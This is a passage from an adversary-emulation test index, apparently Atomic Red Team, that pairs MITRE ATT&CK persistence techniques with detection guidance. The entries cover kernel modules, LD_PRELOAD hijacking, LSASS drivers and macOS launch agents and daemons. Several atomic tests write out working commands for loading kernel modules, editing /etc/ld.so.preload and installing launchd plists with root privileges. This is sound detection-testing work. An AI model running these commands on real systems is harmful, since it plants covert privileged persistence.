Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: - Rhino Labs Cloud Image Backdoor Technique Sept 2019) Adversaries may also - implant Docker images that may be inadvertently used in cloud deployments, - which has been reported in some instances of cryptomining botnets.(Citation: - ATT Cybersecurity Cryptocurrency Attacks on Cloud) " - id: attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T22:47:34.137Z' - created: '2019-09-04T12:04:03.552Z' - x_mitre_is_subtechnique: false - x_mitre_data_sources: - - File monitoring - - Asset management - x_mitre_detection: Monitor interactions with images and containers by users - to identify ones that are added or modified anomalously. - x_mitre_permissions_required: - - User - x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian - x_mitre_platforms: - - GCP - - Azure - - AWS - atomic_tests: [] - T1547.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1547.006 - url: https://attack.mitre.org/techniques/T1547/006 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html - description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. - Retrieved April 6, 2018. - source_name: Linux Kernel Module Programming Guide - - url: http://www.megasecurity.org/papers/Rootkits.pdf - description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved - April 6, 2018. - source_name: iDefense Rootkit Overview - - url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html - description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility - to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.' - source_name: Volatility Phalanx2 - - url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ - description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. - Retrieved December 21, 2017. - source_name: CrowdStrike Linux Rootkit - - url: https://github.com/f0rb1dd3n/Reptile - description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved - April 9, 2018. - source_name: GitHub Reptile - - url: https://github.com/m0nad/Diamorphine - description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux - Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018. - source_name: GitHub Diamorphine - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. - Retrieved April 6, 2018. - source_name: RSAC 2015 San Francisco Patrick Wardle - - url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/ - description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel - Extension Loading’ is Broken. Retrieved April 6, 2018. - source_name: Synack Secure Kernel Extension Broken - - url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/ - description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble - your MacOS spy. Retrieved April 6, 2018.' - source_name: Securelist Ventir - - source_name: Trend Micro Skidmap - url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/ - description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux - Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. - Retrieved June 4, 2020. - - url: http://tldp.org/HOWTO/Module-HOWTO/x197.html - description: Henderson, B. (2006, September 24). How To Insert And Remove - LKMs. Retrieved April 9, 2018. - source_name: Linux Loadable Kernel Module Insert and Remove LKMs - - url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux - description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved - April 9, 2018. - source_name: Wikipedia Loadable Kernel Module - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Kernel Modules and Extensions - description: |- - Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)  - - When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) - - Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. - - Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) - id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-30T21:23:15.188Z' - created: '2020-01-24T17:42:23.339Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - root - x_mitre_detection: |- - Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module) - - For macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity. - - Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r) - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Anastasios Pingios - - Jeremy Galloway - - Red Canary - x_mitre_platforms: - - macOS - - Linux - identifier: T1547.006 - atomic_tests: - - name: Linux - Load Kernel Module via insmod - auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 - description: 'This test uses the insmod command to load a kernel module for - Linux. - -' - supported_platforms: - - linux - input_arguments: - module_name: - description: Name of the kernel module name. - type: string - default: T1547006 - module_path: - description: Folder used to store the module. - type: path - default: "/tmp/T1547.006/T1547006.ko" - temp_folder: - description: Temp folder used to compile the code. - type: path - default: "/tmp/T1547.006" - module_source_path: - description: Path to download Gsecdump binary file - type: url - default: PathToAtomicsFolder/T1547.006/src - dependency_executor_name: bash - dependencies: - - description: 'The kernel module must exist on disk at specified location - -' - prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - -' - get_prereq_command: | - if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; - cp #{module_source_path}/* #{temp_folder}/ - cd #{temp_folder}; make - if [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi; - executor: - command: 'sudo insmod #{module_path} - -' - cleanup_command: | - sudo rmmod #{module_name} - [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} - name: bash - elevation_required: true - T1546.006: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.006 - url: https://attack.mitre.org/techniques/T1546/006 - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: LC_LOAD_DYLIB Addition - description: |- - Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. - - Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) - id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:50:36.235Z' - created: '2020-01-24T14:21:52.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor processes for those that may be used to modify binary - headers. Monitor file systems for changes to application binaries and invalid - checksums/signatures. Changes to binaries that do not line up with application - updates or patches are also extremely suspicious. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Binary file metadata - x_mitre_platforms: - - macOS - atomic_tests: [] - T1574.006: - technique: - id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 - description: |- - Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) - - Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) - - LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process. - name: LD_PRELOAD - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.006 - url: https://attack.mitre.org/techniques/T1574/006 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - source_name: Man LD.SO - url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved - June 15, 2020. - - source_name: TLDP Shared Libraries - url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved - January 31, 2020. - - source_name: Code Injection on Linux and macOS - url: https://www.datawire.io/code-injection-on-linux-and-macos/ - description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt - for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved - December 20, 2017.' - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. - Retrieved December 20, 2017. - source_name: Uninformed Needle - - url: http://phrack.org/issues/51/8.html - description: halflife. (1997, September 1). Shared Library Redirection Techniques. - Retrieved December 20, 2017. - source_name: Phrack halfdead 1997 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:49:46.904Z' - created: '2020-03-13T20:09:59.569Z' - x_mitre_platforms: - - Linux - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Environment variable - x_mitre_detection: |- - Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1574.006 - atomic_tests: - - name: Shared Library Injection via /etc/ld.so.preload - auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - description: "This test adds a shared library to the `ld.so.preload` list to - execute and intercept API calls. This technique was used by threat actor Rocke - during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon - successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. - \n" - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - -' - cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - -' - name: bash - elevation_required: true - - name: Shared Library Injection via LD_PRELOAD - auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - description: | - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - - Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'LD_PRELOAD=#{path_to_shared_library} ls - -' - name: bash - T1547.008: - technique: - created: '2020-01-24T18:38:55.801Z' - modified: '2020-03-25T16:52:26.567Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 - description: |- - Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) - - Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. - name: LSASS Driver - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.008 - url: https://attack.mitre.org/techniques/T1547/008 - - url: https://technet.microsoft.com/library/cc961760.aspx - description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved - November 27, 2017. - source_name: Microsoft Security Subsystem - - url: https://technet.microsoft.com/library/dn408187.aspx - description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. - Retrieved November 27, 2017. - source_name: Microsoft LSA Protection Mar 2014 - - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx - description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November - 27, 2017. - source_name: Microsoft DLL Security - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Vincent Le Toux - x_mitre_data_sources: - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events - 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: - Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. - (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc - utility (Citation: TechNet Autoruns) to examine loaded drivers associated - with the LSA. " - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1543.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.001 - url: https://attack.mitre.org/techniques/T1543/001 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated - code. Retrieved July 5, 2017. - source_name: Antiquated Mac Malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. - source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application - Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. - source_name: OceanLotus for OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Agent - description: "Adversaries may create or modify launch agents to repeatedly execute - malicious payloads as part of persistence. Per Apple’s developer documentation, - when a user logs in, a per-user launchd process is started which loads the - parameters for each launch-on-demand user agent from the property list (plist) - files found in /System/Library/LaunchAgents, /Library/LaunchAgents, - and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent - Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). - These launch agents have property list files which point to the executables - that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install - a new launch agent that can be configured to execute at login by using launchd - or launchctl to load a plist into the appropriate directories (Citation: - Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The - agent name may be disguised by using a name from a related operating system - or benign software. Launch Agents are created with user level privileges and - are executed with the privileges of the user when they log in (Citation: OSX - Malware Detection) (Citation: OceanLotus for OS X). They can be set up to - execute when a specific user logs in (in the specific user’s directory structure) - or when any user logs in (which requires administrator privileges)." - id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T22:11:45.513Z' - created: '2020-01-17T16:10:58.592Z' - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: Monitor Launch Agent creation through additional plist files - and utilities such as Objective-See’s KnockKnock application. Launch Agents - also require files on disk for persistence which can also be monitored via - other file monitoring applications. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_platforms: - - macOS - identifier: T1543.001 - atomic_tests: - - name: Launch Agent - auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - description: 'Create a plist and execute it - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; - exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; - sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} - sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} - cleanup: | - sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} - sudo rm ~/Library/LaunchAgents/#{plist_filename} - T1543.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.004 - url: https://attack.mitre.org/techniques/T1543/004 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf - description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. - Retrieved July 10, 2017.' - source_name: WireLurker - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Daemon - description: "Adversaries may create or modify launch daemons to repeatedly - execute malicious payloads as part of persistence. Per Apple’s developer documentation, - when macOS and OS X boot up, launchd is run to finish system initialization. - This process loads the parameters for each launch-on-demand system-level daemon - from the property list (plist) files found in /System/Library/LaunchDaemons - and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent - Daemons). These LaunchDaemons have property list files which point to the - executables that will be launched (Citation: Methods of Mac Malware Persistence). - \n\nAdversaries may install a new launch daemon that can be configured to - execute at startup by using launchd or launchctl to load a plist into the - appropriate directories (Citation: OSX Malware Detection). The daemon name - may be disguised by using a name from a related operating system or benign - software (Citation: WireLurker). Launch Daemons may be created with administrator - privileges, but are executed under root privileges, so an adversary may also - use a service to escalate privileges from administrator to root. \n\nThe plist - file permissions must be root:wheel, but the script or program that it points - to has no such requirement. So, it is possible for poor configurations to - allow an adversary to modify a current Launch Daemon’s executable and gain - persistence or Privilege Escalation. " - id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:46:44.130Z' - created: '2020-01-17T19:23:15.227Z' - x_mitre_data_sources: - - File monitoring - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor for launch daemon creation or modification through - plist files and utilities such as Objective-See''s KnockKnock application. ' - x_mitre_platforms: - - macOS - identifier: T1543.004 - atomic_tests: - - name: Launch Daemon - auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - description: 'Utilize LaunchDaemon to launch `Hello World` - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and - try again."; exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} - sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | - sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} - sudo rm /Library/LaunchDaemons/#{plist_filename} - T1053.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.004 - url: https://attack.mitre.org/techniques/T1053/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launchd - description: |- - Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). - - An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. - id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:41:14.739Z' - created: '2019-12-03T14:15:27.452Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - root - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." - x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring - x_mitre_platforms: - - macOS - identifier: T1053.004 - atomic_tests: - - name: Event Monitor Daemon Persistence - auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - description: "This test adds persistence via a plist to execute via the 